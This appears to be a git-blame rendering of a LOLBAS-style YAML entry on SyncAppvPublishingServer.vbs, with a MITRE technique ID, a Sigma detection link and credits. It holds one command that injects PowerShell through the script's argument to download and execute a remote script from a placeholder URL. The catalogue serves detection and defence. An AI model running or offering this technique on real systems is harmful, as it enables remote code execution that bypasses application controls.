2018-06-09 00:15:06 +02:00
|
|
|
---
|
2018-09-26 11:41:58 +02:00
|
|
|
Name: Syncappvpublishingserver.vbs
|
|
|
|
Description: Script used related to app-v and publishing server
|
|
|
|
Author: 'Oddvar Moe'
|
2021-01-10 16:04:52 +01:00
|
|
|
Created: 2018-05-25
|
2018-06-09 00:15:06 +02:00
|
|
|
Commands:
|
|
|
|
- Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
|
|
|
Description: Inject PowerShell script code with the provided arguments
|
2018-09-26 11:41:58 +02:00
|
|
|
Usecase: Use Powershell host invoked from vbs script
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1216
|
2022-05-05 12:12:22 +02:00
|
|
|
OperatingSystem: Windows 10, Windows 11
|
2018-12-10 14:28:12 +01:00
|
|
|
Full_Path:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
|
2021-01-10 16:04:52 +01:00
|
|
|
Code_Sample:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Code:
|
|
|
|
Detection:
|
2023-10-18 17:30:34 +02:00
|
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Link: https://twitter.com/monoxgas/status/895045566090010624
|
|
|
|
- Link: https://twitter.com/subTee/status/855738126882316288
|
|
|
|
Acknowledgement:
|
|
|
|
- Person: Nick Landers
|
|
|
|
Handle: '@monoxgas'
|
|
|
|
- Person: Casey Smith
|
|
|
|
Handle: '@subtee'
|